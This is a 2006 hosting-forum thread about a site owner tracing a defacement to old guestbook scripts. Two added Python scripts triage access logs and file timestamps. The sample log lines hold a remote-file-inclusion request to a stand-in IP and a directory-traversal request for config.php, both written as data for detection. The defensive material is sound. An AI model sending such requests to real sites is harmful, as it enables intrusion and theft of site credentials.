zpry Posted April 4, 2006 Yesterday at 3:55 PM EST the chatroom at my site stopped working. This was noticed almost immediately by my site visitors; the chat has been very popular with them for the past six months and has been up and operational for the past year or so. I didn't notice until later in the evening that four of my main index.html files had also been affected. The main www.****/index.html file had been updated at 3:55 pm, and the other three files www.****/section1/index.html etc... Each of those index pages contained a link to someplace and the main index page contained a link to a mime file - when you would visit the main site page, a mime file would try to load and an error message would scroll down from the browser saying I didn't have the right program to run the mime. I then investigated my chat files. Inside the chat directory, under public_html/chatmaindirectory/chat/localization/, the entire localization directory and all the language files inside had been updated at 3:55 PM. I also noticed that my server status link (I am on server 20) was showing one red button and one yellow button; all the rest were green. Disk hda1 (/boot) 95 % (RED BUTTON) Disk hda7 (/home) 84 % (yellow button) So, I wrote a help ticket up and explained all this. Unfortunately, the only responses I got were very standard. I was told not to share my password with anyone, to check the recent visitors and to check IPs that access my cpanel. They did ask if I wanted to restore to a backup... but I have my own backed up files. I uploaded them with FTP and my site is working just fine again. I guess I was hoping that support might be interested in helping me find what caused this, where my site is vulnerable, and help me prevent it from happening again. Any input would be appreciated. ~zpry
MikeJ Posted April 4, 2006 Most likely, they gained access through a vulnerable script you may have installed. The best thing to do is make sure all of your software is current... if you have any old versions installed, update them. And if you have any software installed that you don't use anymore on your account, remove it. Sometimes you can get an idea of what might have been abused if you download and look through your raw logs and look for odd looking requests. Also look for any suspicious files in any world writable directories you have. The red notice on /boot is nothing to worry about. That's just a system partition that is only written to by admins, so that won't ever be a problem. /home is just showing it's getting a little on the full side, but still has a ways to go. That'll be taken care of if it gets too close to full.
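MikeJ's advice to pull the raw access logs and look for odd-looking requests around the time the files changed can be made concrete. The script below is an added example written for this thread, not code from the thread, from cPanel or from any of the scripts mentioned. It assumes the raw log is in the standard Apache "combined" format (which cPanel's raw access logs use); the sample log lines, the incident time (set to 3:55 PM on 3 April 2006, matching the post above), and the suspicious-request patterns are constructed for the example. It narrows the log to a window around the incident and flags the request shapes a defender would look at first in a PHP-script compromise of that era: a URL passed as a parameter value (remote file inclusion), directory traversal, and hits on admin/install/setup scripts.

```python
"""Triage raw access-log lines around a known incident time.

Added example (not from the thread). Assumes Apache/cPanel "combined" log
format; the sample lines, incident time and suspicious patterns are constructed.
"""
import re
from datetime import datetime, timedelta, timezone

# Combined format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Request shapes worth a second look (constructed list; first match wins):
# a URL as a parameter value, directory traversal, admin/install/setup scripts.
SUSPICIOUS = [
    ("remote-url-in-query", re.compile(r"=https?://", re.I)),
    ("traversal", re.compile(r"(\.\./|%2e%2e%2f)", re.I)),
    ("admin-or-install-script", re.compile(r"/(admin|install|setup)[^ ]*\.php", re.I)),
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["dt"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def triage(lines, incident_time, window_minutes=60):
    """Return (label, ip, request) for suspicious requests within the window."""
    lo = incident_time - timedelta(minutes=window_minutes)
    hi = incident_time + timedelta(minutes=window_minutes)
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not (lo <= rec["dt"] <= hi):
            continue  # malformed line, or outside the window of interest
        for label, pattern in SUSPICIOUS:
            if pattern.search(rec["request"]):
                hits.append((label, rec["ip"], rec["request"]))
                break
    return hits


# Constructed incident time: 3:55 PM on 3 April 2006, US Eastern (UTC-4 in April).
INCIDENT = datetime(2006, 4, 3, 15, 55, tzinfo=timezone(timedelta(hours=-4)))

# Constructed sample log lines (private/test-net IPs, made-up paths).
SAMPLE_LOG = [
    '10.0.0.1 - - [03/Apr/2006:15:54:10 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.2 - - [03/Apr/2006:15:55:02 -0400] "GET /oldguestbook/admin.php?include=http://203.0.113.9/x.txt HTTP/1.1" 200 312 "-" "Mozilla/4.0"',
    '10.0.0.3 - - [03/Apr/2006:09:12:44 -0400] "GET /chat/localization/../../config.php HTTP/1.1" 404 210 "-" "curl/7.15"',
    '10.0.0.4 - - [03/Apr/2006:16:20:00 -0400] "POST /chat/admin/setup.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    'not a log line at all',
]


def run_sample():
    """Run triage over the constructed lines with the default one-hour window."""
    return triage(SAMPLE_LOG, INCIDENT)


if __name__ == "__main__":
    # Against a real download: with open("access-log") as fh: triage(fh, INCIDENT)
    for label, ip, request in run_sample():
        print(f"{label:25s} {ip:12s} {request}")
```

The traversal attempt at 09:12 is deliberately left out of the one-hour window to show why the window matters: widen it (or drop it) once the first pass around the known time turns up nothing, as it did for zpry. The patterns are a starting point, not a signature set; anything that hits an old or unlinked script is worth a look even without a pattern match.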
zpry (Author) Posted April 5, 2006
"Most likely, they gained access through a vulnerable script you may have installed. The best thing to do is make sure all of your software is current... if you have any old versions installed, update them. And if you have any software installed that you don't use anymore on your account, remove it."
I recently updated my Advanced Guestbooks to Lazarus(sp) guestbooks.. and the spamming to them was stopped. I also have kept my message boards. Other than that I don't have any scripts - except the chatroom. That program does seem very old and their website on sourceforge hasn't added anything new for a few years. If anyone can recommend a chatroom that is more up to date and secure.. simple is fine - I would appreciate that.
"Sometimes you can get an idea of what might have been abused if you download and look through your raw logs and look for odd looking requests. Also look for any suspicious files in any world writable directories you have."
I did that, and since I knew the approximate time that the site was hacked I was able to focus in on that hour. I didn't see anything unusual. I also constantly check my recent visitors. I keep a close eye on my error log too and I do notice things fairly quickly that are unusual. In recent months I have found hotlinking from myspace which I stopped and guestbook visitors going directly to the forms.. and I stopped them too. I tried to see my ftp logs, but couldn't figure out how to do that; when I clicked on those links in the cpanel (FTP/Account Maintenance) "You can download your raw access logs at the following URLs using the loginsmiling_logs and your account password: " the error came up.. "You dont have permission to open this page" .. I could see my password in the link that was in the address bar, so I know that wasn't the issue. I tried all the links that were in there. Can I get to these logs using FTP? Where are they among all the directories?
"The red notice on /boot is nothing to worry about. That's just a system partition that is only written to by admins, so that won't ever be a problem. /home is just showing it's getting a little on the full side, but still has a ways to go. That'll be taken care of if it gets too close to full."
Thanks, I don't like red buttons flashing - they make me nervous! zoey
TCH-Carl Posted April 5, 2006 From your replies, it seems the hacker got through the chat room scripts. We would recommend disabling it as your backup still contains the outdated one. I do not use chat scripts, so kindly wait till someone can give you details regarding a better one. If you can post a ticket to the help desk explaining the error that you got, they will help you out with the log issue and give you an idea of the depth to which the hack was done.
JTD Posted April 5, 2006 Sigma chat is not a bad chat client, and the nice thing about it is all you do is sign up and use a java code script which you embed in your website's html. http://www.sigmachat.com/
zpry (Author) Posted April 7, 2006 Thanks everyone, I feel the need to update this thread, because for the last few days I have been keeping a close eye on everything to see if I could see where the problem was. I had also been googling to see if I could find any one else having problems with phpmychat. At this point, I don't think it was the chatroom script that was the vulnerable script.. and I'll explain why.. This morning I was looking around in my cpanel and realized that I did have some old scripts still installed - two very old advanced guestbooks (yes, the advice above was weighing on my mind about uninstalling old scripts) - I had kept them installed, because they had been very large with lots of signatures from friends and I wanted to keep them as records, though I had no links to them on my website, so I didn't think they would get visitors. I went to look at those guestbooks, and immediately the same message came up that a Mime file was downloading. I also noticed that the guestbook signatures had been corrupted and I saw a lot of links that had the word Russia in them (reminded me of the localization directory name). I force quit my browser, and then went all through my site making sure nothing had been damaged, and then I went into cpanel and removed those old guestbooks and deleted their databases. So, now I am thinking that was the entry point. At least I hope so. I also deleted all the languages from my phpmychat localization directory except English, just because I worried that was the vulnerable entry point after reading some stuff I found on the net about hacks into Phpmychat. The stuff I found wasn't in English, but from what I saw, they were using those language files to access. I also found this article, but I really don't understand it and it didn't really seem to apply to what happened at my site. http://www.securityfocus.com/bid/13627/discuss So, that is all I am going to do for now unless something else happens. .. hopefully not! Thanks for the advice about removing old unused scripts, as I think that was the bit that is going to save me in the long run. Thanks for the friendly replies too. z
stevevan Posted April 7, 2006 Thanks for the update, Z. Hopefully this may help someone else in the future.
zpry (Author) Posted April 8, 2006 I have one more update on this issue - cripes! I discovered today that in my new updated Lazarus Guestbooks the Admin passwords had been reset! I knew I hadn't forgotten them so I was pretty confused. So, when I looked at my new guestbook files, in the TEMP and PUBLIC directories, there were files added there at the exact same time of the hack earlier in the week (see above posts). I deleted those files.. (I did download them and looked at them - but have no clue what they are or were trying to do - if anyone wants to see them I will save them) but my password still didn't work, so I went to the Lazarus Guestbook site and downloaded the little fix he made that resets your password. I did that fix, and all is well. My new guestbooks were never hacked into or spammed, but somehow my admin password did get reset. I am even more certain than ever that the way the site was hacked was through those OLD guestbooks.. that I should have deleted. Ok.. hopefully this will be my last post to this thread and nothing else turned up damaged. z
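Twice in this thread the finding came from file timestamps: the index pages and the whole chat localization directory at 3:55 PM in the first post, and the files added to the guestbook TEMP and PUBLIC directories at the same minute in the post above. MikeJ's note about world-writable directories is the other half of the same check, since those are where a web-server process can drop files. The script below is an added example, not code from the thread or from any of the products named. It assumes a Unix file system and builds a constructed directory tree (with constructed modification times; the epoch value used corresponds to 3:55 PM EDT on 3 April 2006) in a temporary directory so it runs stand-alone; against a real account you would point the two functions at public_html instead.

```python
"""Find files changed around a known incident time, and world-writable directories.

Added example (not from the thread). Assumes a Unix file system; it builds a
constructed directory tree in a temporary directory so it runs stand-alone.
"""
import os
import shutil
import stat
import tempfile


def files_modified_near(root, incident_ts, window_seconds=300):
    """Paths under root (relative) whose mtime is within window_seconds of incident_ts."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if abs(os.stat(path).st_mtime - incident_ts) <= window_seconds:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def world_writable_dirs(root):
    """Directories under root (relative; "." is root itself) with the other-write bit set."""
    found = []
    for dirpath, _dirs, _files in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            found.append(os.path.relpath(dirpath, root))
    return sorted(found)


def build_sample_tree():
    """Constructed tree loosely mirroring the thread's layout; returns (root, incident_ts).

    Four files share the incident minute, two are months old, and one
    directory is deliberately made world-writable.
    """
    root = tempfile.mkdtemp(prefix="triage-")
    incident = 1_144_094_100  # constructed: 2006-04-03 15:55 EDT as a Unix timestamp
    layout = {
        "index.html": incident,
        "section1/index.html": incident + 3,
        "chat/localization/lang.php": incident,
        "chat/index.php": incident - 30 * 86400,
        "guestbook/temp/upload.php": incident + 60,
        "images/logo.png": incident - 200 * 86400,
    }
    for rel, mtime in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.utime(path, (mtime, mtime))  # set atime and mtime to the constructed value
    # Normalise directory modes regardless of umask, then loosen one on purpose.
    for dirpath, _dirs, _files in os.walk(root):
        os.chmod(dirpath, 0o755)
    os.chmod(os.path.join(root, "guestbook", "temp"), 0o777)
    return root, incident


if __name__ == "__main__":
    root, incident = build_sample_tree()
    try:
        print("changed near incident:", files_modified_near(root, incident))
        print("world-writable dirs:", world_writable_dirs(root))
    finally:
        shutil.rmtree(root)
```

Modification time is easy for an intruder to reset, so an empty result does not prove a clean tree; a cluster of files sharing one minute, as here, is a strong lead in the other direction. The world-writable list is worth keeping short on a shared host: each such directory is somewhere the web server (and so any script it runs) can write.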
TCH-Bruce Posted April 8, 2006 Thanks for the update. Hopefully you won't have any more problems.